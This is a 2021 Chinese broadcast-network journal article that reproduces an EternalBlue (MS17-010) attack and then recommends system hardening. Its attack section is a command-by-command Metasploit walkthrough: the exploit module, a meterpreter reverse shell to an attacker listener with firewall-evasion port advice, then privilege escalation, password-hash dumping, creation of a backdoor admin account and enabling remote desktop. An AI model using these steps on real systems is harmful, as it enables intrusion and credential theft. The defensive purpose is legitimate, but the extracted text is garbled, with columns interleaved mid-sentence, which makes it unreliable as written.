2024年1月6日发(作者:)

《广播电视网络》 2021年第2期 总第374期 网络安全基于“永恒之蓝”漏洞的

渗透攻击与系统安全加固姜巍 天津广播电视网络有限公司摘要:在广电网络多业务平台融合发展的大背景下,网络安全面临越来越严重的挑战。其中,源于“永恒之蓝”漏洞的勒索病毒经过几代变种,时至今日仍然危害巨大,甚至有愈演愈烈之势。本文首先复现了如何利用“永恒之蓝”漏洞进行渗透与攻击,最后基于病毒特点阐述了系统安全加固方案。关键词:“永恒之蓝”  勒索病毒  渗透攻击  系统加固1 引言为满足当前广电业务不断融合发展的需要,虚拟化、云平台、大数据系统、IP化播出前端和制作中心等设备和应用相继投入使用。与此同时,网络安全面临越来越严重的挑战,大量系统和应用漏洞被发布与利用,其中以“永恒之蓝”漏洞最具代表性。“永恒之蓝”利用Windows操作系统SMB服务漏洞获取系统的最高权限,对应微软公司编号MS17-010。不法分子通过改造“永恒之蓝”制作了WannaCry勒索病毒,该病毒利用Windows操作系统445端口存在的漏洞进行传播,并且具有自我复制、主动传播性。被WannaCry勒索病毒入侵后,用户主机、服务器操作系统内的图片、文档、音频、视频、数据等都会被加密,并在桌面弹出勒索对话框,要求受害者支付比特币作为赎金,才能解密并释放被加密的数据。时至今日,各种新型勒索病毒不断涌现,攻击目标不再限于Windows操作系统,Linux操作系统也未能幸免,并且新型勒索病毒对攻击目标的选择越来越精准、隐蔽性越来越强,可以长期潜伏于受害者的内部网络中,当感染的主机和服务器达到一定数量后集中暴发,有的勒索病毒甚至可以预判并删除备份数据,再加密当前运行数据,给企业和用户带来巨大的损失。基于以上原因,我们非常有必要了解“永恒之蓝”漏洞的攻击方式,从而加固防御系统。描,发现局域网内靶机开放端口445。使用Nessus对靶机进行扫描,扫描结果证明靶机存在MS17-010漏洞。3 渗透攻击阶段首先,在Kali Linux中启动Metasploit Framework。其次,寻找“永恒之蓝”相关可利用模块。执行命令“msf 6 > search ms17-010”,发现存在扫描模块“auxiliary/scanner/smb/smb_ms17_010”和攻击模块“exploit/2 信息收集阶段使用NMAP对局域网靶机进行扫61

网络安全windows/smb/ms17_010_eternalblue”。实际情况下,此监听端口可以设置为再次,按以下步骤利用攻击模块443或80来穿越防火墙,以避免8888进行攻击。或4444一类端口被防火墙拦截。运行(1)加载攻击模块[1]。执行命“msf6 exploit(windows/smb/ms17_010_令“msf6 > use exploit/windows/smb/eternalblue) > set LPORT 8888”。ms17_010_eternalblue”。(3)执行攻击。执行“exploit 或(2)设置攻击模块参数。通过者run”命令开始攻击。侦听机器获得“show options”选项查看需要设置靶机反弹的meterpreter shell后,通过的参数。第一步,设置RHOSTS靶“sysinfo” “ifconfig”命令查看主机机IP地址为“10.103.46.145”。和IP地址信息,至此成功攻入靶机。运行“msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 4 后渗透攻击阶段10.103.46.145”。第二步,选择攻击负载payload,使用Windows的反弹4.1  提权并获取管理员密码shell。运行“msf6 exploit(windows/smb/(1)通过“getsystem”命令获取ms17_010_eternalblue) > set payload 管理员权限[2]。windows/x64/meterpreter/reverse_(2)通过“hashdump -i”命令tcp”。第三步,设置LHOST监听获取帐户与密码。获得用户Andy的密主机地址为“10.103.47.173”,码,但为哈希密文,通过互联网撞库该地址为Kali Linux地址。运进行破解。行“msf6 exploit(windows/smb/4.2  创建用户并开启远程桌面服务ms17_010_eternalblue) > set LHOST 通过“shell”命令切换到Windows10.103.47.173”。第四步,设置监听端系统的shell下[3]。口LPORT为8888(默认4444)。在(1)添加用户“hacker”,并归62《广播电视网络》 2021年第2期 总第374期入到“administrators”管理员用户组。运行“C:Windowssystem32>net user hacker 123456 /add”“C:Windowssystem32>net localgroup administrators hacker /add”。(2)开启靶机远程桌面服务。运行“meterpreter > run post/windows/manage/enable_rdp”。至此我们已完全控制靶机,并可以通过上传病毒、添加克隆帐户、增加开机启动项、防火墙开放端口等方法留下永久后门,此处不再赘述。5 系统安全加固随着各种新型勒索病毒的不断涌现,勒索病毒的攻击比以往更加凶猛,给主机与数据安全带来重大挑战,企业数据安全已经成为未来网络安全行业最重要的关注方向。各种新型窃取木马随着勒索病毒一起下发,窃取企业数据,通过“勒索+窃取”两种方式对企业的重要数据进行攻击,同时针对云服务器、云数据、Linux系统的勒索病毒持续增多。由于传统防御手段存在严重缺陷,针对勒索病毒的未来发展趋势,建议建立从主机到系统、从网络流量到主动发现的整体防御体系,以满足可视化、自动化需求,从而大大降低维护难度,缩短应急处理时间,将对数据与系统的危害降至最低。针对上述勒索病毒的发展趋势,建议采取以下具体安全加固方案。5.1  主机安全加固(1)定期对操作系统与应用软件进行漏洞扫描,及时更新补丁或升级应用软件,密切关注漏洞平台发布的预警信息。

《广播电视网络》 2021年第2期 总第374期 网络(2)开启操作系统自带防火墙,续横向探索内部网络,当感染主机达开放业务端口。在局域网安全中,操到一定数量时集中爆发。这对内网流作系统自带防火墙作为最后一道防线量威胁检测提出了新的要求。同时,发挥着非常重要的作用,可以阻拦大由于内部网络主机数量较多,导致调部分木马、蠕虫、勒索病毒与入侵者查运营消耗大量的时间和人力。我们的渗透和攻击。对于重要数据,服务可以部署安全态势感知系统,通过潜器应开启防火墙双向访问控制策略,伏威胁探针对主机和内网流量进行安不仅要控制入方向访问,而且要控制全检测与流量审计。出方向访问,避免木马程序开启反弹如图1所示,潜伏威胁探针作为shell或者从互联网下载病毒程序。流量采集设备,主要与交换机等具备(3)定期进行弱口令检查,设旁路镜像功能的汇聚设备对接,处理置连续输入密码错误,锁定帐户或封镜像流量和输出数据。禁该IP继续登录,防止暴力破解。探针能够自动识别内部服务器,Liunx操作系统可以通过结合使用防火并且自动发现服务器开放端口、存在墙+Fail2ban,防止暴力破解。的漏洞、弱密码等风险。对于病毒、(4)定期检查特殊帐户,删除或蠕虫、木马后门、拒绝服务攻击、终禁用过期、临时、克隆、空口令帐户。端攻击、扫描攻击、SQL注入、XSS、(5)开启日志审计功能,用户日缓冲区溢出、欺骗劫持等攻击威胁具志保存至少六个月。有高精度的检测能力。(6)安装基于主机的入侵检测系安全态势感知平台部署在内网,统[4]或杀毒软件。可以集中管理部署在各个位置的探针,收集探针抓取的日志,分析异常行为,5.2  部署安全态势感知系统可视化展示访问关系、可疑访问和攻类似于挖矿病毒,新型勒索病毒击行为,第一时间定位病毒或者恶意一般会在内部网络潜伏3~6个月,持攻击,快速处理或者隔离相应服务器图1 探针对流量的处理流程示意图安全或主机以避免勒索病毒感染更多的主机和数据。5.3  数据备份与恢复遭到勒索病毒攻击时,数据备份十分重要,企业重要数据应选择异地备份,主用系统与异地备份系统之间的链路应该部署安全隔离设备,确保异地备份数据不受入侵。当主用数据被勒索病毒感染时,应迅速断开与异地备份系统的连接,确认病毒被清理干净后才可进行数据恢复操作,避免备份数据同时被病毒感染,造成不可恢复的重大损失。同时,还应建立健全数据备份与恢复管理制度,定期进行数据恢复演练,确保备份数据的可用性和完整性。6 结束语网络环境的复杂性、多变性、以及信息系统的脆弱性,决定了网络安全威胁的客观存在。近年来,新型勒索病毒频繁攻击教育、医疗、汽车等行业,造成重大经济损失和不良影响。处于转型期的广电网络,在积极拥抱互联网的同时,需将网络安全放在首位,把安全实现互联网融合发展作为持续探究的课题。参考文献[1]闵海钊,李合鹏,刘学伟等.网络安全攻防技术实战[M].北京:电子工业出版社,2020,(10):253.[2]Archer译.Lee Allen,Tedi Heriyanto. Kali Linux渗透测试的艺术[M].北京:人民邮电出版社,2017,(5):239.[3]大学霸IT达人,从实践中学习Metasploit5渗透测试[M].北京:机械工业出版社2019(7):201.[4]吴礼发,洪征,李华波.网络攻防原理与技术[M].北京:电子工业出版社, 2019,(9):63